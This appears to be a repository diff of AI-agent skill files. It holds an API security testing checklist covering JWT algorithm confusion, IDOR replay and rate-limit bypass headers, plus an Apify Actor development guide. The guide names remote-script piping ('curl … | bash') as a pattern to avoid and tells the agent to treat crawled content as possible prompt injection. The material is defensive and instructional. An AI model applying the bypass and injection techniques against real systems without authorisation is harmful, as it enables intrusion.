| **API8: Misconfiguration** | Debug endpoints, CORS |
|
||||
| **API9: Inventory** | Shadow APIs, old versions |
|
||||
| **API10: Unsafe Consumption** | Third-party API trust |
|
||||
|
||||
---
|
||||
|
||||
## Authentication Testing
|
||||
|
||||
### JWT Testing
|
||||
|
||||
| Check | What to Test |
|
||||
|-------|--------------|
|
||||
| Algorithm | None, algorithm confusion |
|
||||
| Secret | Weak secrets, brute force |
|
||||
| Claims | Expiration, issuer, audience |
|
||||
| Signature | Manipulation, key injection |
|
||||
|
||||
### Session Testing
|
||||
|
||||
| Check | What to Test |
|
||||
|-------|--------------|
|
||||
| Generation | Predictability |
|
||||
| Storage | Client-side security |
|
||||
| Expiration | Timeout enforcement |
|
||||
| Invalidation | Logout effectiveness |
|
||||
|
||||
---
|
||||
|
||||
## Authorization Testing
|
||||
|
||||
| Test Type | Approach |
|
||||
|-----------|----------|
|
||||
| **Horizontal** | Access peer users' data |
|
||||
| **Vertical** | Access higher privilege functions |
|
||||
| **Context** | Access outside allowed scope |
|
||||
|
||||
### BOLA/IDOR Testing
|
||||
|
||||
1. Identify resource IDs in requests
|
||||
2. Capture request with user A's session
|
||||
3. Replay with user B's session
|
||||
4. Check for unauthorized access
|
||||
|
||||
---
|
||||
|
||||
## Input Validation Testing
|
||||
|
||||
| Injection Type | Test Focus |
|
||||
|----------------|------------|
|
||||
| SQL | Query manipulation |
|
||||
| NoSQL | Document queries |
|
||||
| Command | System commands |
|
||||
| LDAP | Directory queries |
|
||||
|
||||
**Approach:** Test all parameters, try type coercion, test boundaries, check error messages.
|
||||
|
||||
---
|
||||
|
||||
## Rate Limiting Testing
|
||||
|
||||
| Aspect | Check |
|
||||
|--------|-------|
|
||||
| Existence | Is there any limit? |
|
||||
| Bypass | Headers, IP rotation |
|
||||
| Scope | Per-user, per-IP, global |
|
||||
|
||||
**Bypass techniques:** X-Forwarded-For, different HTTP methods, case variations, API versioning.
|
||||
|
||||
---
|
||||
|
||||
## GraphQL Security
|
||||
|
||||
| Test | Focus |
|
||||
|------|-------|
|
||||
| Introspection | Schema disclosure |
|
||||
| Batching | Query DoS |
|
||||
| Nesting | Depth-based DoS |
|
||||
| Authorization | Field-level access |
|
||||
|
||||
---
|
||||
|
||||
## Security Testing Checklist
|
||||
|
||||
**Authentication:**
|
||||
- [ ] Test for bypass
|
||||
- [ ] Check credential strength
|
||||
- [ ] Verify token security
|
||||
|
||||
**Authorization:**
|
||||
- [ ] Test BOLA/IDOR
|
||||
- [ ] Check privilege escalation
|
||||
- [ ] Verify function access
|
||||
|
||||
**Input:**
|
||||
- [ ] Test all parameters
|
||||
- [ ] Check for injection
|
||||
|
||||
**Config:**
|
||||
- [ ] Check CORS
|
||||
- [ ] Verify headers
|
||||
- [ ] Test error handling
|
||||
|
||||
---
|
||||
|
||||
> **Remember:** APIs are the backbone of modern apps. Test them like attackers will.
|
||||
41
web-app/public/skills/api-patterns/trpc.md
Normal file
41
web-app/public/skills/api-patterns/trpc.md
Normal file
@@ -0,0 +1,41 @@
|
||||
# tRPC Principles
|
||||
|
||||
> End-to-end type safety for TypeScript monorepos.
|
||||
|
||||
## When to Use
|
||||
|
||||
```
|
||||
✅ Perfect fit:
|
||||
├── TypeScript on both ends
|
||||
├── Monorepo structure
|
||||
├── Internal tools
|
||||
├── Rapid development
|
||||
└── Type safety critical
|
||||
|
||||
❌ Poor fit:
|
||||
├── Non-TypeScript clients
|
||||
├── Public API
|
||||
├── Need REST conventions
|
||||
└── Multiple language backends
|
||||
```
|
||||
|
||||
## Key Benefits
|
||||
|
||||
```
|
||||
Why tRPC:
|
||||
├── Zero schema maintenance
|
||||
├── End-to-end type inference
|
||||
├── IDE autocomplete across stack
|
||||
├── Instant API changes reflected
|
||||
└── No code generation step
|
||||
```
|
||||
|
||||
## Integration Patterns
|
||||
|
||||
```
|
||||
Common setups:
|
||||
├── Next.js + tRPC (most common)
|
||||
├── Monorepo with shared types
|
||||
├── Remix + tRPC
|
||||
└── Any TS frontend + backend
|
||||
```
|
||||
22
web-app/public/skills/api-patterns/versioning.md
Normal file
22
web-app/public/skills/api-patterns/versioning.md
Normal file
@@ -0,0 +1,22 @@
|
||||
# Versioning Strategies
|
||||
|
||||
> Plan for API evolution from day one.
|
||||
|
||||
## Decision Factors
|
||||
|
||||
| Strategy | Implementation | Trade-offs |
|
||||
|----------|---------------|------------|
|
||||
| **URI** | /v1/users | Clear, easy caching |
|
||||
| **Header** | Accept-Version: 1 | Cleaner URLs, harder discovery |
|
||||
| **Query** | ?version=1 | Easy to add, messy |
|
||||
| **None** | Evolve carefully | Best for internal, risky for public |
|
||||
|
||||
## Versioning Philosophy
|
||||
|
||||
```
|
||||
Consider:
|
||||
├── Public API? → Version in URI
|
||||
├── Internal only? → May not need versioning
|
||||
├── GraphQL? → Typically no versions (evolve schema)
|
||||
├── tRPC? → Types enforce compatibility
|
||||
```
|
||||
@@ -3,6 +3,7 @@ name: api-security-best-practices
|
||||
description: "Implement secure API design patterns including authentication, authorization, input validation, rate limiting, and protection against common API vulnerabilities"
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# API Security Best Practices
|
||||
|
||||
@@ -1,11 +1,10 @@
|
||||
---
|
||||
name: api-security-testing
|
||||
description: "API security testing workflow for REST and GraphQL APIs covering authentication, authorization, rate limiting, input validation, and security best practices."
|
||||
source: personal
|
||||
risk: safe
|
||||
domain: security
|
||||
category: granular-workflow-bundle
|
||||
version: 1.0.0
|
||||
risk: safe
|
||||
source: personal
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# API Security Testing Workflow
|
||||
|
||||
@@ -3,6 +3,7 @@ name: api-testing-observability-api-mock
|
||||
description: "You are an API mocking expert specializing in realistic mock services for development, testing, and demos. Design mocks that simulate real API behavior and enable parallel development."
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# API Mocking Framework
|
||||
|
||||
File diff suppressed because it is too large
Load Diff
218
web-app/public/skills/apify-actor-development/SKILL.md
Normal file
218
web-app/public/skills/apify-actor-development/SKILL.md
Normal file
@@ -0,0 +1,218 @@
|
||||
---
|
||||
name: apify-actor-development
|
||||
description: "Develop, debug, and deploy Apify Actors - serverless cloud programs for web scraping, automation, and data processing. Use when creating new Actors, modifying existing ones, or troubleshooting Acto..."
|
||||
---
|
||||
|
||||
# Apify Actor Development
|
||||
|
||||
**Important:** Before you begin, fill in the `generatedBy` property in the meta section of `.actor/actor.json`. Replace it with the tool and model you're currently using, such as "Claude Code with Claude Sonnet 4.5". This helps Apify monitor and improve AGENTS.md for specific AI tools and models.
|
||||
|
||||
## What are Apify Actors?
|
||||
|
||||
Actors are serverless programs inspired by the UNIX philosophy - programs that do one thing well and can be easily combined to build complex systems. They're packaged as Docker images and run in isolated containers in the cloud.
|
||||
|
||||
**Core Concepts:**
|
||||
- Accept well-defined JSON input
|
||||
- Perform isolated tasks (web scraping, automation, data processing)
|
||||
- Produce structured JSON output to datasets and/or store data in key-value stores
|
||||
- Can run from seconds to hours or even indefinitely
|
||||
- Persist state and can be restarted
|
||||
|
||||
## Prerequisites & Setup (MANDATORY)
|
||||
|
||||
Before creating or modifying actors, verify that `apify` CLI is installed `apify --help`.
|
||||
|
||||
If it is not installed, use one of these methods (listed in order of preference):
|
||||
|
||||
```bash
|
||||
# Preferred: install via a package manager (provides integrity checks)
|
||||
npm install -g apify-cli
|
||||
|
||||
# Or (Mac): brew install apify-cli
|
||||
```
|
||||
|
||||
> **Security note:** Do NOT install the CLI by piping remote scripts to a shell
|
||||
> (e.g. `curl … | bash` or `irm … | iex`). Always use a package manager.
|
||||
|
||||
When the apify CLI is installed, check that it is logged in with:
|
||||
|
||||
```bash
|
||||
apify info # Should return your username
|
||||
```
|
||||
|
||||
If it is not logged in, check if the `APIFY_TOKEN` environment variable is defined (if not, ask the user to generate one on https://console.apify.com/settings/integrations and then define `APIFY_TOKEN` with it).
|
||||
|
||||
Then authenticate using one of these methods:
|
||||
|
||||
```bash
|
||||
# Option 1 (preferred): The CLI automatically reads APIFY_TOKEN from the environment.
|
||||
# Just ensure the env var is exported and run any apify command — no explicit login needed.
|
||||
|
||||
# Option 2: Interactive login (prompts for token without exposing it in shell history)
|
||||
apify login
|
||||
```
|
||||
|
||||
> **Security note:** Avoid passing tokens as command-line arguments (e.g. `apify login -t <token>`).
|
||||
> Arguments are visible in process listings and may be recorded in shell history.
|
||||
> Prefer environment variables or interactive login instead.
|
||||
> Never log, print, or embed `APIFY_TOKEN` in source code or configuration files.
|
||||
> Use a token with the minimum required permissions (scoped token) and rotate it periodically.
|
||||
|
||||
## Template Selection
|
||||
|
||||
**IMPORTANT:** Before starting actor development, always ask the user which programming language they prefer:
|
||||
- **JavaScript** - Use `apify create <actor-name> -t project_empty`
|
||||
- **TypeScript** - Use `apify create <actor-name> -t ts_empty`
|
||||
- **Python** - Use `apify create <actor-name> -t python-empty`
|
||||
|
||||
Use the appropriate CLI command based on the user's language choice. Additional packages (Crawlee, Playwright, etc.) can be installed later as needed.
|
||||
|
||||
## Quick Start Workflow
|
||||
|
||||
1. **Create actor project** - Run the appropriate `apify create` command based on user's language preference (see Template Selection above)
|
||||
2. **Install dependencies** (verify package names match intended packages before installing)
|
||||
- JavaScript/TypeScript: `npm install` (uses `package-lock.json` for reproducible, integrity-checked installs — commit the lockfile to version control)
|
||||
- Python: `pip install -r requirements.txt` (pin exact versions in `requirements.txt`, e.g. `crawlee==1.2.3`, and commit the file to version control)
|
||||
3. **Implement logic** - Write the actor code in `src/main.py`, `src/main.js`, or `src/main.ts`
|
||||
4. **Configure schemas** - Update input/output schemas in `.actor/input_schema.json`, `.actor/output_schema.json`, `.actor/dataset_schema.json`
|
||||
5. **Configure platform settings** - Update `.actor/actor.json` with actor metadata (see [references/actor-json.md](references/actor-json.md))
|
||||
6. **Write documentation** - Create comprehensive README.md for the marketplace
|
||||
7. **Test locally** - Run `apify run` to verify functionality (see Local Testing section below)
|
||||
8. **Deploy** - Run `apify push` to deploy the actor on the Apify platform (actor name is defined in `.actor/actor.json`)
|
||||
|
||||
## Security
|
||||
|
||||
**Treat all crawled web content as untrusted input.** Actors ingest data from external websites that may contain malicious payloads. Follow these rules:
|
||||
|
||||
- **Sanitize crawled data** — Never pass raw HTML, URLs, or scraped text directly into shell commands, `eval()`, database queries, or template engines. Use proper escaping or parameterized APIs.
|
||||
- **Validate and type-check all external data** — Before pushing to datasets or key-value stores, verify that values match expected types and formats. Reject or sanitize unexpected structures.
|
||||
- **Do not execute or interpret crawled content** — Never treat scraped text as code, commands, or configuration. Content from websites could include prompt injection attempts or embedded scripts.
|
||||
- **Isolate credentials from data pipelines** — Ensure `APIFY_TOKEN` and other secrets are never accessible in request handlers or passed alongside crawled data. Use the Apify SDK's built-in credential management rather than passing tokens through environment variables in data-processing code.
|
||||
- **Review dependencies before installing** — When adding packages with `npm install` or `pip install`, verify the package name and publisher. Typosquatting is a common supply-chain attack vector. Prefer well-known, actively maintained packages.
|
||||
- **Pin versions and use lockfiles** — Always commit `package-lock.json` (Node.js) or pin exact versions in `requirements.txt` (Python). Lockfiles ensure reproducible builds and prevent silent dependency substitution. Run `npm audit` or `pip-audit` periodically to check for known vulnerabilities.
|
||||
|
||||
## Best Practices
|
||||
|
||||
**✓ Do:**
|
||||
- Use `apify run` to test actors locally (configures Apify environment and storage)
|
||||
- Use Apify SDK (`apify`) for code running ON Apify platform
|
||||
- Validate input early with proper error handling and fail gracefully
|
||||
- Use CheerioCrawler for static HTML (10x faster than browsers)
|
||||
- Use PlaywrightCrawler only for JavaScript-heavy sites
|
||||
- Use router pattern (createCheerioRouter/createPlaywrightRouter) for complex crawls
|
||||
- Implement retry strategies with exponential backoff
|
||||
- Use proper concurrency: HTTP (10-50), Browser (1-5)
|
||||
- Set sensible defaults in `.actor/input_schema.json`
|
||||
- Define output schema in `.actor/output_schema.json`
|
||||
- Clean and validate data before pushing to dataset
|
||||
- Use semantic CSS selectors with fallback strategies
|
||||
- Respect robots.txt, ToS, and implement rate limiting
|
||||
- **Always use `apify/log` package** — censors sensitive data (API keys, tokens, credentials)
|
||||
- Implement readiness probe handler (required if your Actor uses standby mode)
|
||||
|
||||
**✗ Don't:**
|
||||
- Use `npm start`, `npm run start`, `npx apify run`, or similar commands to run actors (use `apify run` instead)
|
||||
- Assume local storage from `apify run` is pushed to or visible in the Apify Console — it is local-only; deploy with `apify push` and run on the platform to see results in the Console
|
||||
- Rely on `Dataset.getInfo()` for final counts on Cloud
|
||||
- Use browser crawlers when HTTP/Cheerio works
|
||||
- Hard code values that should be in input schema or environment variables
|
||||
- Skip input validation or error handling
|
||||
- Overload servers - use appropriate concurrency and delays
|
||||
- Scrape prohibited content or ignore Terms of Service
|
||||
- Store personal/sensitive data unless explicitly permitted
|
||||
- Use deprecated options like `requestHandlerTimeoutMillis` on CheerioCrawler (v3.x)
|
||||
- Use `additionalHttpHeaders` - use `preNavigationHooks` instead
|
||||
- Pass raw crawled content into shell commands, `eval()`, or code-generation functions
|
||||
- Use `console.log()` or `print()` instead of the Apify logger — these bypass credential censoring
|
||||
- Disable standby mode without explicit permission
|
||||
|
||||
## Logging
|
||||
|
||||
See [references/logging.md](references/logging.md) for complete logging documentation including available log levels and best practices for JavaScript/TypeScript and Python.
|
||||
|
||||
Check `usesStandbyMode` in `.actor/actor.json` - only implement if set to `true`.
|
||||
|
||||
## Commands
|
||||
|
||||
```bash
|
||||
apify run # Run Actor locally
|
||||
apify login # Authenticate account
|
||||
apify push # Deploy to Apify platform (uses name from .actor/actor.json)
|
||||
apify help # List all commands
|
||||
```
|
||||
|
||||
**IMPORTANT:** Always use `apify run` to test actors locally. Do not use `npm run start`, `npm start`, `yarn start`, or other package manager commands - these will not properly configure the Apify environment and storage.
|
||||
|
||||
## Local Testing
|
||||
|
||||
When testing an actor locally with `apify run`, provide input data by creating a JSON file at:
|
||||
|
||||
```
|
||||
storage/key_value_stores/default/INPUT.json
|
||||
```
|
||||
|
||||
This file should contain the input parameters defined in your `.actor/input_schema.json`. The actor will read this input when running locally, mirroring how it receives input on the Apify platform.
|
||||
|
||||
**IMPORTANT - Local storage is NOT synced to the Apify Console:**
|
||||
- Running `apify run` stores all data (datasets, key-value stores, request queues) **only on your local filesystem** in the `storage/` directory.
|
||||
- This data is **never** automatically uploaded or pushed to the Apify platform. It exists only on your machine.
|
||||
- To verify results on the Apify Console, you must deploy the Actor with `apify push` and then run it on the platform.
|
||||
- Do **not** rely on checking the Apify Console to verify results from local runs — instead, inspect the local `storage/` directory or check the Actor's log output.
|
||||
|
||||
## Standby Mode
|
||||
|
||||
See [references/standby-mode.md](references/standby-mode.md) for complete standby mode documentation including readiness probe implementation for JavaScript/TypeScript and Python.
|
||||
|
||||
## Project Structure
|
||||
|
||||
```
|
||||
.actor/
|
||||
├── actor.json # Actor config: name, version, env vars, runtime
|
||||
├── input_schema.json # Input validation & Console form definition
|
||||
└── output_schema.json # Output storage and display templates
|
||||
src/
|
||||
└── main.js/ts/py # Actor entry point
|
||||
storage/ # Local-only storage (NOT synced to Apify Console)
|
||||
├── datasets/ # Output items (JSON objects)
|
||||
├── key_value_stores/ # Files, config, INPUT
|
||||
└── request_queues/ # Pending crawl requests
|
||||
Dockerfile # Container image definition
|
||||
```
|
||||
|
||||
## Actor Configuration
|
||||
|
||||
See [references/actor-json.md](references/actor-json.md) for complete actor.json structure and configuration options.
|
||||
|
||||
## Input Schema
|
||||
|
||||
See [references/input-schema.md](references/input-schema.md) for input schema structure and examples.
|
||||
|
||||
## Output Schema
|
||||
|
||||
See [references/output-schema.md](references/output-schema.md) for output schema structure, examples, and template variables.
|
||||
|
||||
## Dataset Schema
|
||||
|
||||
See [references/dataset-schema.md](references/dataset-schema.md) for dataset schema structure, configuration, and display properties.
|
||||
|
||||
## Key-Value Store Schema
|
||||
|
||||
See [references/key-value-store-schema.md](references/key-value-store-schema.md) for key-value store schema structure, collections, and configuration.
|
||||
|
||||
|
||||
## Apify MCP Tools
|
||||
|
||||
If MCP server is configured, use these tools for documentation:
|
||||
|
||||
- `search-apify-docs` - Search documentation
|
||||
- `fetch-apify-docs` - Get full doc pages
|
||||
|
||||
Otherwise, the MCP Server url: `https://mcp.apify.com/?tools=docs`.
|
||||
|
||||
## Resources
|
||||
|
||||
- [docs.apify.com/llms.txt](https://docs.apify.com/llms.txt) - Apify quick reference documentation
|
||||
- [docs.apify.com/llms-full.txt](https://docs.apify.com/llms-full.txt) - Apify complete documentation
|
||||
- [https://crawlee.dev/llms.txt](https://crawlee.dev/llms.txt) - Crawlee quick reference documentation
|
||||
- [https://crawlee.dev/llms-full.txt](https://crawlee.dev/llms-full.txt) - Crawlee complete documentation
|
||||
- [whitepaper.actor](https://raw.githubusercontent.com/apify/actor-whitepaper/refs/heads/master/README.md) - Complete Actor specification
|
||||
@@ -0,0 +1,66 @@
|
||||
# Actor Configuration (actor.json)
|
||||
|
||||
The `.actor/actor.json` file contains the Actor's configuration including metadata, schema references, and platform settings.
|
||||
|
||||
## Structure
|
||||
|
||||
```json
|
||||
{
|
||||
"actorSpecification": 1,
|
||||
"name": "project-name",
|
||||
"title": "Project Title",
|
||||
"description": "Actor description",
|
||||
"version": "0.0",
|
||||
"meta": {
|
||||
"templateId": "template-id",
|
||||
"generatedBy": "<FILL-IN-TOOL-AND-MODEL>"
|
||||
},
|
||||
"input": "./input_schema.json",
|
||||
"output": "./output_schema.json",
|
||||
"storages": {
|
||||
"dataset": "./dataset_schema.json"
|
||||
},
|
||||
"dockerfile": "../Dockerfile"
|
||||
}
|
||||
```
|
||||
|
||||
## Example
|
||||
|
||||
```json
|
||||
{
|
||||
"actorSpecification": 1,
|
||||
"name": "project-cheerio-crawler-javascript",
|
||||
"title": "Project Cheerio Crawler Javascript",
|
||||
"description": "Crawlee and Cheerio project in javascript.",
|
||||
"version": "0.0",
|
||||
"meta": {
|
||||
"templateId": "js-crawlee-cheerio",
|
||||
"generatedBy": "Claude Code with Claude Sonnet 4.5"
|
||||
},
|
||||
"input": "./input_schema.json",
|
||||
"output": "./output_schema.json",
|
||||
"storages": {
|
||||
"dataset": "./dataset_schema.json"
|
||||
},
|
||||
"dockerfile": "../Dockerfile"
|
||||
}
|
||||
```
|
||||
|
||||
## Properties
|
||||
|
||||
- `actorSpecification` (integer, required) - Version of actor specification (currently 1)
|
||||
- `name` (string, required) - Actor identifier (lowercase, hyphens allowed)
|
||||
- `title` (string, required) - Human-readable title displayed in UI
|
||||
- `description` (string, optional) - Actor description for marketplace
|
||||
- `version` (string, required) - Semantic version number
|
||||
- `meta` (object, optional) - Metadata about actor generation
|
||||
- `templateId` (string) - ID of template used to create the actor
|
||||
- `generatedBy` (string) - Tool and model name that generated/modified the actor (e.g., "Claude Code with Claude Sonnet 4.5")
|
||||
- `input` (string, optional) - Path to input schema file
|
||||
- `output` (string, optional) - Path to output schema file
|
||||
- `storages` (object, optional) - Storage schema references
|
||||
- `dataset` (string) - Path to dataset schema file
|
||||
- `keyValueStore` (string) - Path to key-value store schema file
|
||||
- `dockerfile` (string, optional) - Path to Dockerfile
|
||||
|
||||
**Important:** Always fill in the `generatedBy` property with the tool and model you're currently using (e.g., "Claude Code with Claude Sonnet 4.5") to help Apify improve documentation.
|
||||
@@ -0,0 +1,209 @@
|
||||
# Dataset Schema Reference
|
||||
|
||||
The dataset schema defines how your Actor's output data is structured, transformed, and displayed in the Output tab in the Apify Console.
|
||||
|
||||
## Examples
|
||||
|
||||
### JavaScript and TypeScript
|
||||
|
||||
Consider an example Actor that calls `Actor.pushData()` to store data into dataset:
|
||||
|
||||
```javascript
|
||||
import { Actor } from 'apify';
|
||||
// Initialize the JavaScript SDK
|
||||
await Actor.init();
|
||||
|
||||
/**
|
||||
* Actor code
|
||||
*/
|
||||
await Actor.pushData({
|
||||
numericField: 10,
|
||||
pictureUrl: 'https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_92x30dp.png',
|
||||
linkUrl: 'https://google.com',
|
||||
textField: 'Google',
|
||||
booleanField: true,
|
||||
dateField: new Date(),
|
||||
arrayField: ['#hello', '#world'],
|
||||
objectField: {},
|
||||
});
|
||||
|
||||
// Exit successfully
|
||||
await Actor.exit();
|
||||
```
|
||||
|
||||
### Python
|
||||
|
||||
Consider an example Actor that calls `Actor.push_data()` to store data into dataset:
|
||||
|
||||
```python
|
||||
# Dataset push example (Python)
|
||||
import asyncio
|
||||
from datetime import datetime
|
||||
from apify import Actor
|
||||
|
||||
async def main():
|
||||
await Actor.init()
|
||||
|
||||
# Actor code
|
||||
await Actor.push_data({
|
||||
'numericField': 10,
|
||||
'pictureUrl': 'https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_92x30dp.png',
|
||||
'linkUrl': 'https://google.com',
|
||||
'textField': 'Google',
|
||||
'booleanField': True,
|
||||
'dateField': datetime.now().isoformat(),
|
||||
'arrayField': ['#hello', '#world'],
|
||||
'objectField': {},
|
||||
})
|
||||
|
||||
# Exit successfully
|
||||
await Actor.exit()
|
||||
|
||||
if __name__ == '__main__':
|
||||
asyncio.run(main())
|
||||
```
|
||||
|
||||
## Configuration
|
||||
|
||||
To set up the Actor's output tab UI, reference a dataset schema file in `.actor/actor.json`:
|
||||
|
||||
```json
|
||||
{
|
||||
"actorSpecification": 1,
|
||||
"name": "book-library-scraper",
|
||||
"title": "Book Library Scraper",
|
||||
"version": "1.0.0",
|
||||
"storages": {
|
||||
"dataset": "./dataset_schema.json"
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
Then create the dataset schema in `.actor/dataset_schema.json`:
|
||||
|
||||
```json
|
||||
{
|
||||
"actorSpecification": 1,
|
||||
"fields": {},
|
||||
"views": {
|
||||
"overview": {
|
||||
"title": "Overview",
|
||||
"transformation": {
|
||||
"fields": [
|
||||
"pictureUrl",
|
||||
"linkUrl",
|
||||
"textField",
|
||||
"booleanField",
|
||||
"arrayField",
|
||||
"objectField",
|
||||
"dateField",
|
||||
"numericField"
|
||||
]
|
||||
},
|
||||
"display": {
|
||||
"component": "table",
|
||||
"properties": {
|
||||
"pictureUrl": {
|
||||
"label": "Image",
|
||||
"format": "image"
|
||||
},
|
||||
"linkUrl": {
|
||||
"label": "Link",
|
||||
"format": "link"
|
||||
},
|
||||
"textField": {
|
||||
"label": "Text",
|
||||
"format": "text"
|
||||
},
|
||||
"booleanField": {
|
||||
"label": "Boolean",
|
||||
"format": "boolean"
|
||||
},
|
||||
"arrayField": {
|
||||
"label": "Array",
|
||||
"format": "array"
|
||||
},
|
||||
"objectField": {
|
||||
"label": "Object",
|
||||
"format": "object"
|
||||
},
|
||||
"dateField": {
|
||||
"label": "Date",
|
||||
"format": "date"
|
||||
},
|
||||
"numericField": {
|
||||
"label": "Number",
|
||||
"format": "number"
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Structure
|
||||
|
||||
```json
|
||||
{
|
||||
"actorSpecification": 1,
|
||||
"fields": {},
|
||||
"views": {
|
||||
"<VIEW_NAME>": {
|
||||
"title": "string (required)",
|
||||
"description": "string (optional)",
|
||||
"transformation": {
|
||||
"fields": ["string (required)"],
|
||||
"unwind": ["string (optional)"],
|
||||
"flatten": ["string (optional)"],
|
||||
"omit": ["string (optional)"],
|
||||
"limit": "integer (optional)",
|
||||
"desc": "boolean (optional)"
|
||||
},
|
||||
"display": {
|
||||
"component": "table (required)",
|
||||
"properties": {
|
||||
"<FIELD_NAME>": {
|
||||
"label": "string (optional)",
|
||||
"format": "text|number|date|link|boolean|image|array|object (optional)"
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Properties
|
||||
|
||||
### Dataset Schema Properties
|
||||
|
||||
- `actorSpecification` (integer, required) - Specifies the version of dataset schema structure document (currently only version 1)
|
||||
- `fields` (JSONSchema object, required) - Schema of one dataset object (use JsonSchema Draft 2020-12 or compatible)
|
||||
- `views` (DatasetView object, required) - Object with API and UI views description
|
||||
|
||||
### DatasetView Properties
|
||||
|
||||
- `title` (string, required) - Visible in UI Output tab and API
|
||||
- `description` (string, optional) - Only available in API response
|
||||
- `transformation` (ViewTransformation object, required) - Data transformation applied when loading from Dataset API
|
||||
- `display` (ViewDisplay object, required) - Output tab UI visualization definition
|
||||
|
||||
### ViewTransformation Properties
|
||||
|
||||
- `fields` (string[], required) - Fields to present in output (order matches column order)
|
||||
- `unwind` (string[], optional) - Deconstructs nested children into parent object
|
||||
- `flatten` (string[], optional) - Transforms nested object into flat structure
|
||||
- `omit` (string[], optional) - Removes specified fields from output
|
||||
- `limit` (integer, optional) - Maximum number of results (default: all)
|
||||
- `desc` (boolean, optional) - Sort order (true = newest first)
|
||||
|
||||
### ViewDisplay Properties
|
||||
|
||||
- `component` (string, required) - Only `table` is available
|
||||
- `properties` (Object, optional) - Keys matching `transformation.fields` with ViewDisplayProperty values
|
||||
|
||||
### ViewDisplayProperty Properties
|
||||
|
||||
- `label` (string, optional) - Table column header
|
||||
- `format` (string, optional) - One of: `text`, `number`, `date`, `link`, `boolean`, `image`, `array`, `object`
|
||||
@@ -0,0 +1,66 @@
|
||||
# Input Schema Reference
|
||||
|
||||
The input schema defines the input parameters for an Actor. It's a JSON object comprising various field types supported by the Apify platform.
|
||||
|
||||
## Structure
|
||||
|
||||
```json
|
||||
{
|
||||
"title": "<INPUT-SCHEMA-TITLE>",
|
||||
"type": "object",
|
||||
"schemaVersion": 1,
|
||||
"properties": {
|
||||
/* define input fields here */
|
||||
},
|
||||
"required": []
|
||||
}
|
||||
```
|
||||
|
||||
## Example
|
||||
|
||||
```json
|
||||
{
|
||||
"title": "E-commerce Product Scraper Input",
|
||||
"type": "object",
|
||||
"schemaVersion": 1,
|
||||
"properties": {
|
||||
"startUrls": {
|
||||
"title": "Start URLs",
|
||||
"type": "array",
|
||||
"description": "URLs to start scraping from (category pages or product pages)",
|
||||
"editor": "requestListSources",
|
||||
"default": [{ "url": "https://example.com/category" }],
|
||||
"prefill": [{ "url": "https://example.com/category" }]
|
||||
},
|
||||
"followVariants": {
|
||||
"title": "Follow Product Variants",
|
||||
"type": "boolean",
|
||||
"description": "Whether to scrape product variants (different colors, sizes)",
|
||||
"default": true
|
||||
},
|
||||
"maxRequestsPerCrawl": {
|
||||
"title": "Max Requests per Crawl",
|
||||
"type": "integer",
|
||||
"description": "Maximum number of pages to scrape (0 = unlimited)",
|
||||
"default": 1000,
|
||||
"minimum": 0
|
||||
},
|
||||
"proxyConfiguration": {
|
||||
"title": "Proxy Configuration",
|
||||
"type": "object",
|
||||
"description": "Proxy settings for anti-bot protection",
|
||||
"editor": "proxy",
|
||||
"default": { "useApifyProxy": false }
|
||||
},
|
||||
"locale": {
|
||||
"title": "Locale",
|
||||
"type": "string",
|
||||
"description": "Language/country code for localized content",
|
||||
"default": "cs",
|
||||
"enum": ["cs", "en", "de", "sk"],
|
||||
"enumTitles": ["Czech", "English", "German", "Slovak"]
|
||||
}
|
||||
},
|
||||
"required": ["startUrls"]
|
||||
}
|
||||
```
|
||||
@@ -0,0 +1,129 @@
|
||||
# Key-Value Store Schema Reference
|
||||
|
||||
The key-value store schema organizes keys into logical groups called collections for easier data management.
|
||||
|
||||
## Examples
|
||||
|
||||
### JavaScript and TypeScript
|
||||
|
||||
Consider an example Actor that calls `Actor.setValue()` to save records into the key-value store:
|
||||
|
||||
```javascript
|
||||
import { Actor } from 'apify';
|
||||
// Initialize the JavaScript SDK
|
||||
await Actor.init();
|
||||
|
||||
/**
|
||||
* Actor code
|
||||
*/
|
||||
await Actor.setValue('document-1', 'my text data', { contentType: 'text/plain' });
|
||||
|
||||
await Actor.setValue(`image-${imageID}`, imageBuffer, { contentType: 'image/jpeg' });
|
||||
|
||||
// Exit successfully
|
||||
await Actor.exit();
|
||||
```
|
||||
|
||||
### Python
|
||||
|
||||
Consider an example Actor that calls `Actor.set_value()` to save records into the key-value store:
|
||||
|
||||
```python
|
||||
# Key-Value Store set example (Python)
|
||||
import asyncio
|
||||
from apify import Actor
|
||||
|
||||
async def main():
|
||||
await Actor.init()
|
||||
|
||||
# Actor code
|
||||
await Actor.set_value('document-1', 'my text data', content_type='text/plain')
|
||||
|
||||
image_id = '123' # example placeholder
|
||||
image_buffer = b'...' # bytes buffer with image data
|
||||
await Actor.set_value(f'image-{image_id}', image_buffer, content_type='image/jpeg')
|
||||
|
||||
# Exit successfully
|
||||
await Actor.exit()
|
||||
|
||||
if __name__ == '__main__':
|
||||
asyncio.run(main())
|
||||
```
|
||||
|
||||
## Configuration
|
||||
|
||||
To configure the key-value store schema, reference a schema file in `.actor/actor.json`:
|
||||
|
||||
```json
|
||||
{
|
||||
"actorSpecification": 1,
|
||||
"name": "data-collector",
|
||||
"title": "Data Collector",
|
||||
"version": "1.0.0",
|
||||
"storages": {
|
||||
"keyValueStore": "./key_value_store_schema.json"
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
Then create the key-value store schema in `.actor/key_value_store_schema.json`:
|
||||
|
||||
```json
|
||||
{
|
||||
"actorKeyValueStoreSchemaVersion": 1,
|
||||
"title": "Key-Value Store Schema",
|
||||
"collections": {
|
||||
"documents": {
|
||||
"title": "Documents",
|
||||
"description": "Text documents stored by the Actor",
|
||||
"keyPrefix": "document-"
|
||||
},
|
||||
"images": {
|
||||
"title": "Images",
|
||||
"description": "Images stored by the Actor",
|
||||
"keyPrefix": "image-",
|
||||
"contentTypes": ["image/jpeg"]
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Structure
|
||||
|
||||
```json
|
||||
